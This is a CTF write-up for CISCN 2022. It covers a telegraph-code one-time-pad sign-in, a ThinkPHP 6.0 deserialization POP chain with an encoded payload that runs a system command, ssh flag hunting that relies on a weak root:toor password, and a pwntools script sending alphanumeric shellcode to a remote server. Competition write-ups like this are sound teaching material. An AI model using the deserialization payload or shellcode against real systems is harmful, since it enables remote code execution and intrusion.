Original link: https://5ime.cn/ciscn-2022.html
I feel that this year's challenges were easier than last year's, and all three crypto challenges were unintended solutions. A good friend helped me with the 150 multiple-choice questions, and I logged off after six CTF challenges~
Misc
Sign-in
First, as the challenge description says, send the keyword to the official account to get the hint.
Open the challenge environment and find the codebook. According to the official account's hint, the 7*4 digits are the first 28 digits.
Click pure-number mode and take the first 28 digits:
1272685121234614783219665440
Then "弼时安全到达了" in telegraph code is:
1732 2514 1344 0356 0451 6671 0055
First send a GET request to start the telegraph:
/send?msg=s
Then send a GET request with the 28 digits obtained after digit-wise addition modulo ten:
/send?msg=2904836534674960728375375495
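The "modulo ten" step above is a one-time pad over telegraph code groups. The following is an added example, not code from the original write-up: it maps each character to its 4-digit code (table constructed from the seven groups given above), adds the pad digit-wise mod 10, and shows the inverse (digit-wise subtraction) that the receiver needs.

```python
# Added example: telegraph-code one-time pad used by the sign-in challenge.
# The code table below is constructed from the groups in the write-up and
# covers only the characters of that message.
TELEGRAPH_CODE = {
    "弼": "1732", "时": "2514", "安": "1344", "全": "0356",
    "到": "0451", "达": "6671", "了": "0055",
}
CODE_TO_CHAR = {v: k for k, v in TELEGRAPH_CODE.items()}

PAD = "1272685121234614783219665440"  # first 28 digits from the codebook page
MESSAGE = "弼时安全到达了"


def encode_message(text: str) -> str:
    """Map each character to its 4-digit telegraph code and concatenate."""
    return "".join(TELEGRAPH_CODE[ch] for ch in text)


def decode_groups(digits: str) -> str:
    """Split a digit stream into 4-digit groups and map them back to characters."""
    if len(digits) % 4:
        raise ValueError("telegraph code stream must be a multiple of 4 digits")
    return "".join(CODE_TO_CHAR[digits[i:i + 4]] for i in range(0, len(digits), 4))


def add_mod10(code: str, pad: str) -> str:
    """Digit-wise (code + pad) mod 10; the pad must cover the whole message."""
    if len(pad) < len(code):
        raise ValueError("pad shorter than message")
    if not (code.isdigit() and pad.isdigit()):
        raise ValueError("code and pad must be decimal digits")
    return "".join(str((int(c) + int(p)) % 10) for c, p in zip(code, pad))


def sub_mod10(cipher: str, pad: str) -> str:
    """Inverse of add_mod10: digit-wise (cipher - pad) mod 10."""
    return "".join(str((int(c) - int(p)) % 10) for c, p in zip(cipher, pad))


def encrypt(text: str, pad: str) -> str:
    return add_mod10(encode_message(text), pad)


def decrypt(cipher: str, pad: str) -> str:
    return decode_groups(sub_mod10(cipher, pad))


if __name__ == "__main__":
    c = encrypt(MESSAGE, PAD)
    print(c)                 # 2904836534674960728375375495
    print(decrypt(c, PAD))   # 弼时安全到达了
```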
WEB
ezpop
It is ThinkPHP 6.0, so just search for an exp on Baidu (ThinkPHP 6.0 deserialization chain audit and analysis: https://forum.butian.net/share/1168); we only need to find the deserialization point. A dirsearch scan finds a www.zip file, and there is a deserialization point in the index.php controller.
```php
<?php
namespace think {
    use think\route\Url;

    abstract class Model {
        private $lazySave;
        private $exists;
        protected $withEvent;
        protected $table;
        private $data;
        private $force;

        public function __construct() {
            $this->lazySave  = true;
            $this->withEvent = false;
            $this->exists    = true;
            $this->table     = new Url();
            $this->force     = true;
            $this->data      = ["1"];
        }
    }
}

namespace think\model {
    use think\Model;

    class Pivot extends Model {
        function __construct() {
            parent::__construct();
        }
    }

    $b = new Pivot();
    echo urlencode(serialize($b));
}

namespace think\route {
    use think\Middleware;
    use think\Validate;

    class Url {
        protected $url;
        protected $domain;
        protected $app;
        protected $route;

        public function __construct() {
            $this->url    = 'a:';
            $this->domain = "<?php system('cat /flag.txt');?>";
            $this->app    = new Middleware();
            $this->route  = new Validate();
        }
    }
}

namespace think {
    use think\view\driver\Php;

    class Validate {
        public function __construct() {
            $this->type['getDomainBind'] = [new Php(), 'display'];
        }
    }

    class Middleware {
        public function __construct() {
            $this->request = "sp4c1ous";
        }
    }
}

namespace think\view\driver {
    class Php {
        public function __construct() {}
    }
}
```
payload
```
// ?s=index/test or /index.php/index/test
a=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A6%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A15%3A%22think%5Croute%5CUrl%22%3A4%3A%7Bs%3A6%3A%22%00%2A%00url%22%3Bs%3A2%3A%22a%3A%22%3Bs%3A9%3A%22%00%2A%00domain%22%3Bs%3A32%3A%22%3C%3Fphp+system%28%27cat+%2Fflag.txt%27%29%3B%3F%3E%22%3Bs%3A6%3A%22%00%2A%00app%22%3BO%3A16%3A%22think%5CMiddleware%22%3A1%3A%7Bs%3A7%3A%22request%22%3Bs%3A8%3A%22sp4c1ous%22%3B%7Ds%3A8%3A%22%00%2A%00route%22%3BO%3A14%3A%22think%5CValidate%22%3A1%3A%7Bs%3A4%3A%22type%22%3Ba%3A1%3A%7Bs%3A13%3A%22getDomainBind%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A21%3A%22think%5Cview%5Cdriver%5CPhp%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%22display%22%3B%7D%7D%7D%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7Ds%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3B%7D
```
Crypto
Two-way authentication based on challenge code & Two-way authentication based on challenge code 2
Connect via ssh directly and search for the flag:
```
find / -name 'flag*'
cat /root/cube-shell/instance/flag_server/flag*
```
The first flag is for "Two-way authentication based on challenge code" (基于挑战码的双向认证), the second one is for "Two-way authentication based on challenge code 2" (基于挑战码的双向认证2).
Two-way authentication based on challenge code 3
Unintended solution: weak password, account and password root:toor.
```
cat /root/cube-shell/instance/flag_server/flag*
```
PWN
login-nomal
Navigate to main > sub_FFD(). It is obviously executing sc (shellcode).
```python
from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'

# p = process('./login')
p = remote('123.56.87.204', 36979)

pl = "msg:ro0tt\nopt:1\n"
p.sendlineafter(">>", pl)

key = "Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a071N000"
pl = "msg:" + key + "\nopt:2\n"
p.sendlineafter(">>", pl)
p.interactive()
```